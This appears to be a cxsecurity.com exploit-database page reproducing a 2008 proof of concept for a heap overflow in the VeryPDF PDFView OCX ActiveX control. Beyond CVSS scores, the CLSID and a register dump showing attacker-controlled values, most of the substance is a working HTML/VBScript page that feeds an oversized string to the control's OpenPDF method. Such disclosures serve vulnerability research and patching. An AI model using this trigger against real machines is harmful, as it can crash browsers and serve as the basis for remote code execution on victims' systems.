VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow PoC

2008.12.13
Credit: r0ut3r
Risk: High
Local: Yes
Remote: No
CWE: CWE-119


CVSS Base Score: 9.3/10
Impact Subscore: 10/10
Exploitability Subscore: 8.6/10
Exploit range: Remote
Attack complexity: Medium
Authentication: No required
Confidentiality impact: Complete
Integrity impact: Complete
Availability impact: Complete

<!-- VeryPDF PDFView OCX ActiveX OpenPDF Heap Overflow Discovered & Written By: r0ut3r (writ3r [at] gmail.com / www.bmgsec.com.au) Advisory: http://www.bmgsec.com.au/advisory/39/ --------------------------------------------------- Tested on: WinXP Pro SP2 Version: 2.0.0.1 GUID: {433268D7-2CD4-43E6-AA24-2188672E7252} RegKey Safe for Script: True RegKey Safe for Init: True EAX 0003C910 ASCII "AAAAAAAAA"" ECX 000301D0 EDX 00000040 EBX 41414141 ESP 0013B8D8 EBP 0013BAF4 ESI 0003C908 ASCII "AAAAAAAAAAAAAAAAA"" EDI 41414141 EIP 7C91B3FB ntdll.7C91B3FB --> <object classid='clsid:433268D7-2CD4-43E6-AA24-2188672E7252' id='target'></object> <script language='vbscript'> Sub Boom buff = String(1006, "A") target.OpenPDF buff, 1, 1 End Sub </script> <input type=button onclick=Boom() value='Boom?'>

References:

http://www.bmgsec.com.au/advisories/openpdf.txt


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2019, cxsecurity.com

 

Back to Top